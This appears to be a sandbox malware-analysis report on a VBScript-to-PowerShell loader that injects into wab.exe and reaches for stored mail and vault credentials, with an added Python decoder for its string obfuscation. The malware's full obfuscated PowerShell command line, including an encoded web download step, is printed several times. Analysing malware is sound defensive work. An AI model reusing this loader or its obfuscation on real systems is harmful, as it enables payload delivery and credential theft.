Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winmm.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rstrtmgr.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: pstorec.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: pstorec.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 0000000E.00000002.1726081150.0000000008390000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf | source: powershell.exe, 0000000E.00000002.1723632726.000000000741D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB | source: powershell.exe, 0000000E.00000002.1723632726.00000000073BF000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsa", "0")
Source: Yara match | File source: 0000000E.00000002.1727059954.000000000BAFD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1726977424.00000000088B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Forbytter)$global:commercializing = [System.Text.Encoding]::ASCII.GetString($Rengue)$global:Uncrystallizabilities=$commercializing.substring($Kontekstfri,$Untastefulness)<#Hyperobtru
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Baghold $Kalsomining $Disapprobations), (Edsaflggelsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Taktnxr = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Praiser)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kildeskats, $false).DefineType($Glansperioder, $M
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Forbytter)$global:commercializing = [System.Text.Encoding]::ASCII.GetString($Rengue)$global:Uncrystallizabilities=$commercializing.substring($Kontekstfri,$Untastefulness)<#Hyperobtru
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
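The Brassart function quoted in the command line above is the whole obfuscation scheme of this stage: every literal is filler text with one real character every eight positions, and the decode loop reads index 7, 15, 23, ... with a width of $Transplantat, which becomes 1 because the script increments an unassigned variable once the ${host}.CurrentCulture check passes. The decoder below is an added example written for this page, not part of the Joe Sandbox report or of the sample; the encoded literals are copied from the command line as rendered here. One caveat: this rendering appears to have dropped non-ASCII characters from the script (variable names such as Skrbeligt157 and Branddr read like Danish words missing ø), which shifts the eight-character alignment of any literal that contained one. The User-Agent literals and the $Paleoandesite literal decode cleanly, and the latter is exactly the cmd.exe command line the report shows executing; the $Skrbeligt157 literal decodes correctly only as far as its http:// host, and $Grossisten (the invocation verb) decodes to garbage from the rendered text.

```python
import re


def brassart(s: str, width: int = 1, step: int = 8, start: int = 7) -> str:
    """Re-implementation of the Brassart function from the quoted command line.
    $Transplantat is never assigned, so `$Transplantat++` turns $null into 1
    once the ${host}.CurrentCulture check passes; the loop then copies one
    character at index 7, 15, 23, ... and stops before the final character."""
    out = []
    i = start
    while i < len(s) - width:        # $Catacrotism -lt ($Slingrer.Length - $Transplantat)
        out.append(s[i:i + width])   # $Slingrer.SUBsTRIng($Catacrotism, $Transplantat)
        i += step
    return "".join(out)


# Encoded literals copied from the command line quoted in this report, split
# into 64-character pieces (Python joins adjacent string literals).
ENC_DELETIVE = (" UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/"
                "saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoon"
                "Ho edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina "
                "spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.ei"
                "Sp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4"
                "Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1"
                "Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc Haggadk"
                "BantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1"
                " Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf"
                " .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0"
                "Cleansg ")
ENC_CAPKIN = (" Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik ise"
              "Irishgrnpopsi,stUnaisle ")
# Raw strings because the literal carries a backslash.
ENC_PALEOANDESITE = (r" BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrp"
                     r"Tidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nA"
                     r"midwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed ei"
                     r"familieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi ins"
                     r"Sortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumo"
                     r"Unciale DroplettSubvers ")
# Tail is misaligned in this rendering; only the scheme and host decode reliably.
ENC_SKRBELIGT157 = ("Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1"
                    "Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8"
                    "Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT Forsake"
                    "Opga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.b"
                    "ueformlA,teriopInspirak Mortif ")

_LITERAL = re.compile(r"Brassart\s+'([^']*)'")


def decode_literals(script: str) -> list:
    """Decode every `Brassart '<filler>'` literal in a PowerShell fragment, in order."""
    return [brassart(lit) for lit in _LITERAL.findall(script)]


# Constructed fragment in the shape of the quoted script, built from the literals above.
SAMPLE_FRAGMENT = ("$Capkin=Brassart '" + ENC_CAPKIN + "';"
                   + "$Conscionableness=Brassart 'Stateli>Stalact ';"
                   + "$Paleoandesite = Brassart '" + ENC_PALEOANDESITE + "';")


if __name__ == "__main__":
    for name, enc in (("$Deletive", ENC_DELETIVE), ("$Capkin", ENC_CAPKIN),
                      ("$Paleoandesite", ENC_PALEOANDESITE),
                      ("$Skrbeligt157", ENC_SKRBELIGT157)):
        print(f"{name:>16} -> {brassart(enc)!r}")
    print(decode_literals(SAMPLE_FRAGMENT))
```

$Deletive decodes to a Firefox User-Agent value and $Capkin to the header name, which together with the http:// scheme in $Skrbeligt157 is the WebClient download the next stage performs; $Paleoandesite decodes to the cmd.exe command line the report records under process creation. When working from the raw .vbs rather than this rendering, the non-ASCII characters are present and every literal decodes.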
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle 
';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik 
iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,20_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACD86DCA push eax; iretd 2_2_00007FFAACD86DCD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACD85479 push ebp; iretd 2_2_00007FFAACD85538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0300EC78 pushfd ; retf 14_2_0300EC79
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07751FB2 push eax; mov dword ptr [esp], ecx14_2_077521B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923F155 push eax; iretd 14_2_0923F15E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_09235D96 push edx; ret 14_2_09235D9D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923B9E0 push edx; ret 14_2_0923B9E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_09240862 push ebp; ret 14_2_09240834
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_09240709 push 8FC93C6Fh; iretd 14_2_0924070E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923AF63 push cs; retf 14_2_0923AFD6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923C3A7 pushad ; iretd 14_2_0923C3B2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923AFB5 push ss; retf 14_2_0923AFC2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0923039E push eax; iretd 14_2_0923039F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_092407E2 push ebp; ret 14_2_09240834
